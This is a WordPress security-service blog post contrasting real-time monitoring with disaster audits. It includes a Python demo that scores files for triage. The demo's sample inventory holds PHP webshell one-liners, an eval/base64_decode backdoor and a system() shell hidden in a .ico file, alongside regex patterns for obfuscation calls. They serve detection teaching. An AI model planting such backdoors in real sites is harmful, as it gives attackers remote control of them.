When you enlist our EUROPEAN EMERGENCY WordPress Services team to run disaster audits, it is important to understand which solutions and processes we use to actively identify threats. Disaster audits (WordPress hack removal, WordPress deface removal) are reactive efforts to detect persistent threats that have already evaded your existing security controls. You must adopt the mindset that those controls have already failed: relying on the same defensive tooling that missed the intrusion to now find it defeats the purpose of the identification process.
Let's take a closer look at the difference between disaster audits and real-time security solutions. Real-time monitoring is tuned for low false positive (FP) alerting: it is meant to stay quiet on normal activity and sound the alarm only for actual security incidents.
Disaster auditing tools take the opposite approach. They are built to pull and mine as much data as possible, and false positives are not normally a big concern. The larger number of flagged items in the subset of data the WordPress Services team examines over the course of a few days is accepted, because the patterns within those flags form the basis of a lead.
Ultimately, a disaster audit and disaster detection (more accurately, disaster prevention) are not the same thing; this is a common misconception. In a disaster audit you are not waiting for alarms to go off, which is what real-time security solutions are built for. Instead you optimize for low false negatives (FN), accepting more false positives in exchange for missing fewer threats. The diagram below shows where the focus of disaster audit data should fall: between the low-FP end of the spectrum that monitoring lives on and the low-FN end that an audit needs.
Anomalies, outliers and suspicious activities are leads, and leads need to be scored. A disaster audit should collect enough data to conduct its own investigation without relying on tools that only flag potential incidents. The goal of any disaster audit is to triage those leads and find the threats the existing controls could not.
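As an added illustration of the two postures described above (example code written for this page, not part of the original post and not Infocyte or Delta Risk tooling): a strict rule set tuned for low false positives beside a broad hunt rule set that tolerates false positives, scores every lead, and then pivots from strong leads to the files that reference them. The WordPress file inventory, the last-deployment date, the rule weights and the triage threshold are all constructed assumptions; on a real site the inventory would come from a file-collection pass over the webroot.

```python
"""Two detection postures over one WordPress file inventory: a strict
"monitoring" rule set (few false positives, more false negatives) and a
broad "audit" rule set that scores leads for triage. All data is constructed."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumed last legitimate release to the site. Files modified after it are
# suspicious, not proof of compromise.
LAST_DEPLOY = datetime(2024, 3, 1, 10, 0)


@dataclass
class FileRecord:
    path: str
    modified: datetime
    content: str  # leading bytes of the file, as a collection tool would capture


# Constructed inventory: one obvious webshell, one theme file turned into a
# loader, the dropper it includes, one benign plugin that legitimately calls
# base64_decode(), and an untouched core file.
INVENTORY = [
    FileRecord("wp-content/uploads/2024/03/img.php", LAST_DEPLOY + timedelta(days=9),
               '<?php eval(base64_decode($_POST["c"]));'),
    FileRecord("wp-content/themes/twentytwenty/footer.php", LAST_DEPLOY + timedelta(days=12),
               '<?php include($_SERVER["DOCUMENT_ROOT"]."/wp-content/uploads/.x.ico"); ?>'),
    FileRecord("wp-content/uploads/.x.ico", LAST_DEPLOY + timedelta(days=12),
               '<?php $f=$_REQUEST["f"]; @system($f);'),
    FileRecord("wp-content/plugins/backup-tool/class-archive.php", LAST_DEPLOY - timedelta(days=40),
               '<?php $header = base64_decode($encoded_header); // legitimate use'),
    FileRecord("wp-includes/version.php", LAST_DEPLOY - timedelta(days=40),
               "<?php $wp_version = '6.4.3';"),
]

OBFUSCATION = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\(")
PHP_TAG = re.compile(r"<\?php")
INPUT_SINK = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")


def monitoring_alerts(inventory):
    """Real-time posture: alert only on the high-confidence combination of a
    .php file under uploads that also shows obfuscation. Few false positives,
    but anything that does not match exactly is a false negative."""
    return [
        f.path for f in inventory
        if f.path.startswith("wp-content/uploads/") and f.path.endswith(".php")
        and OBFUSCATION.search(f.content)
    ]


# Hunt rules: each is weak on its own and fires on benign files too.
# (name, weight, predicate); weights are assumed, not calibrated.
HUNT_RULES = [
    ("php_under_uploads", 3,
     lambda f: f.path.startswith("wp-content/uploads/") and PHP_TAG.search(f.content)),
    ("non_php_ext_with_php", 3,
     lambda f: not f.path.endswith(".php") and PHP_TAG.search(f.content)),
    ("modified_after_deploy", 2, lambda f: f.modified > LAST_DEPLOY),
    ("obfuscation_call", 1, lambda f: OBFUSCATION.search(f.content)),
    ("user_input_reaches_code", 2, lambda f: INPUT_SINK.search(f.content)),
]


def score_leads(inventory):
    """Audit posture: keep every file that trips any rule, sum the weights of
    the rules it tripped, and return (path, score, rule_names) sorted for triage."""
    leads = []
    for f in inventory:
        hits = [(name, w) for name, w, pred in HUNT_RULES if pred(f)]
        if hits:
            leads.append((f.path, sum(w for _, w in hits), [name for name, _ in hits]))
    leads.sort(key=lambda lead: lead[1], reverse=True)
    return leads


def pivot(leads, inventory, threshold=4):
    """Second pass: a file whose content references the path of a strong lead
    inherits that lead's score. This is how a loader with no obfuscation of its
    own (the theme footer) is pulled into triage by the dropper it includes."""
    content_of = {f.path: f.content for f in inventory}
    strong = [(p, s) for p, s, _ in leads if s >= threshold]
    promoted = []
    for path, score, hits in leads:
        for spath, sscore in strong:
            if spath != path and spath in content_of[path]:
                score += sscore
                hits = hits + [f"references:{spath}"]
        promoted.append((path, score, hits))
    promoted.sort(key=lambda lead: lead[1], reverse=True)
    return promoted


def triage(leads, threshold=4):
    """Leads at or above the threshold go to an analyst; the rest stay as context."""
    return [lead for lead in leads if lead[1] >= threshold]


if __name__ == "__main__":
    print("monitoring alerts:", monitoring_alerts(INVENTORY))
    for path, score, hits in triage(pivot(score_leads(INVENTORY), INVENTORY)):
        print(f"{score:2d}  {path}  {hits}")
```

Run as written, the monitoring rule raises exactly one alert (the eval-based shell under uploads) and silently misses both the .ico dropper and the theme footer that loads it. The hunt rules flag the benign backup plugin too, at a score of 1, which is the tolerated false positive; the dropper scores highest on its own, and the pivot step lifts the theme footer to the top of the triage list because it references the dropper by path.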
What other tools and techniques should your hunt teams be using to successfully hunt down malicious threats? In the webinar "Threat Hunting Versus Compromise Assessments: What's the Difference?", Infocyte Founder and Chief Product Officer Chris Gerritz and Andrew Cook of Delta Risk discuss various hunt methodologies that hunt teams can employ. View it on demand: CYBER SECURITY WEBINAR.